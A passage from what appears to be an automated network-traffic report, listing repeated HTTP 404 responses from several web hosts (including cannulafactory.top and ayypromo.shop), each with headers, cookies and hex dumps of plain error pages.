6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:38:42 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 16052X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:38:49 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-sorting-hat-podid: 156x-sorting-hat-shopid: 68519428253vary: Accept-Encodingx-frame-options: DENYx-shopid: 68519428253x-shardid: 156content-language: en-HKx-shopify-nginx-no-cookies: 0set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:49 GMT; SameSite=Laxset-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:49 GMT; SameSite=Laxset-cookie: localization=HK; path=/; expires=Thu, 09 Oct 2025 11:38:49 GMT; SameSite=Laxset-cookie: _shopify_y=6bab0783-0043-4cd0-b2d1-ef924f93f83d; Expires=Thu, 09-Oct-25 11:38:49 GMT; Domain=cannulafactory.top; Path=/; SameSite=Laxset-cookie: _shopify_s=c8048fc5-4b7a-4fe6-a81c-481de043f12a; Expires=Wed, 09-Oct-24 12:08:49 GMT; Domain=cannulafactory.top; Data Raw: Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:38:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-sorting-hat-podid: 156x-sorting-hat-shopid: 68519428253vary: Accept-Encodingx-frame-options: DENYx-shopid: 68519428253x-shardid: 156content-language: en-HKx-shopify-nginx-no-cookies: 0set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:52 GMT; SameSite=Laxset-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:52 GMT; SameSite=Laxset-cookie: localization=HK; path=/; expires=Thu, 09 Oct 2025 11:38:52 GMT; SameSite=Laxset-cookie: _shopify_y=3d162a42-eb70-4f01-aa59-ffd04ffcecbf; Expires=Thu, 09-Oct-25 11:38:52 GMT; Domain=cannulafactory.top; Path=/; SameSite=Laxset-cookie: _shopify_s=d6bd0a50-9099-4704-ac58-8121e8bbcbf4; Expires=Wed, 09-Oct-24 12:08:52 GMT; Domain=cannulafactory.top; Data Raw: Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 11:38:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closex-sorting-hat-podid: 156x-sorting-hat-shopid: 68519428253vary: Accept-Encodingx-frame-options: DENYx-shopid: 68519428253x-shardid: 156content-language: en-HKx-shopify-nginx-no-cookies: 0set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:54 GMT; SameSite=Laxset-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=cannulafactory.top; path=/; expires=Thu, 10 Oct 2024 11:38:54 GMT; SameSite=Laxset-cookie: localization=HK; path=/; expires=Thu, 09 Oct 2025 11:38:54 GMT; SameSite=Laxset-cookie: _shopify_y=77fdd3de-6657-4e10-9ca7-aefa942072f6; Expires=Thu, 09-Oct-25 11:38:54 GMT; Domain=cannulafactory.top; Path=/; SameSite=Laxset-cookie: _shopify_s=64c69e05-8692-4034-b483-b1d5831203db; Expires=Wed, 09-Oct-24 12:08:54 GMT; Domain=cannulafactory.top; Data Raw: Data Ascii:
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 11:39:02 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62378-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 11:39:05 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62378-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 11:39:08 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62378-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 11:39:11 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a62378-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 11:39:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 0b 4a cd 49 2c 49 4d 51 08 48 4c 4f 55 c8 cb 2f 51 48 cb 2f cd 4b b1 d1 07 4a d9 14 d8 05 e7 17 15 55 ea 28 94 a7 2a 24 27 e6 81 65 33 f3 52 14 4a 32 12 4b 14 0a 80 1a f4 6c f4 0b ec 00 92 2e 89 84 46 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 540JI,IMQHLOU/QH/KJU(*$'e3RJ2Kl.F0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 11:39:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 0b 4a cd 49 2c 49 4d 51 08 48 4c 4f 55 c8 cb 2f 51 48 cb 2f cd 4b b1 d1 07 4a d9 14 d8 05 e7 17 15 55 ea 28 94 a7 2a 24 27 e6 81 65 33 f3 52 14 4a 32 12 4b 14 0a 80 1a f4 6c f4 0b ec 00 92 2e 89 84 46 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 540JI,IMQHLOU/QH/KJU(*$'e3RJ2Kl.F0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 11:39:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 35 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 30 b4 0b 4a cd 49 2c 49 4d 51 08 48 4c 4f 55 c8 cb 2f 51 48 cb 2f cd 4b b1 d1 07 4a d9 14 d8 05 e7 17 15 55 ea 28 94 a7 2a 24 27 e6 81 65 33 f3 52 14 4a 32 12 4b 14 0a 80 1a f4 6c f4 0b ec 00 92 2e 89 84 46 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 540JI,IMQHLOU/QH/KJU(*$'e3RJ2Kl.F0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 11:39:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 34 36 0d 0a 3c 68 31 3e 52 65 6c 61 74 65 64 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 68 31 3e 3c 70 3e 53 6f 72 72 79 2c 20 77 65 20 63 61 6e 6e 6f 74 20 66 69 6e 64 20 74 68 61 74 20 70 61 67 65 2e 3c 2f 70 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 46<h1>Related Page not found</h1><p>Sorry, we cannot find that page.</p>0
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Wed, 09 Oct 2024 11:39:52 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2024-10-09T11:39:57.5130416Z
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg8_=ep8vbQ2A7sjFh3el; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 11:59:58 GMTSet-Cookie: __ddg9_=191.96.150.187; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 11:59:58 GMTSet-Cookie: __ddg10_=1728473998; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 11:59:58 GMTSet-Cookie: __ddg1_=dVDZzNIF1y2HLqrrm2Ip; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 09-Oct-2025 11:39:58 GMTDate: Wed, 09 Oct 2024 11:39:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg8_=5mUOWJgRNxqEpNlA; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:00 GMTSet-Cookie: __ddg9_=191.96.150.187; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:00 GMTSet-Cookie: __ddg10_=1728474000; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:00 GMTSet-Cookie: __ddg1_=2rXAhEpSnOUQn1VCBC4Z; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 09-Oct-2025 11:40:00 GMTDate: Wed, 09 Oct 2024 11:40:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg8_=hG4kKGcqtMixKh4C; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:03 GMTSet-Cookie: __ddg9_=191.96.150.187; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:03 GMTSet-Cookie: __ddg10_=1728474003; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:03 GMTSet-Cookie: __ddg1_=dQ6dBoD8cDhAPpTjSd6I; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 09-Oct-2025 11:40:03 GMTDate: Wed, 09 Oct 2024 11:40:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg8_=g1KJrCKAbyTfnKRz; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:06 GMTSet-Cookie: __ddg9_=191.96.150.187; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:06 GMTSet-Cookie: __ddg10_=1728474006; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 12:00:06 GMTSet-Cookie: __ddg1_=nhkafp7zj4SxosVkXiVL; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 09-Oct-2025 11:40:06 GMTDate: Wed, 09 Oct 2024 11:40:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 738Last-Modified: Tue, 27 Aug 2024 08:59:13 GMTETag: "2e2-620a674a57ae6"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 77 69 64 74 68 3d 22 31 32 30 22 20 68 65 69 67 68 74 3d 22 38 38 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href="http://tilda.cc"> <img src="http://tilda.ws/img/logo404.png" border="0" width="120" height="88" alt="Tilda" /> </a> <br> <br
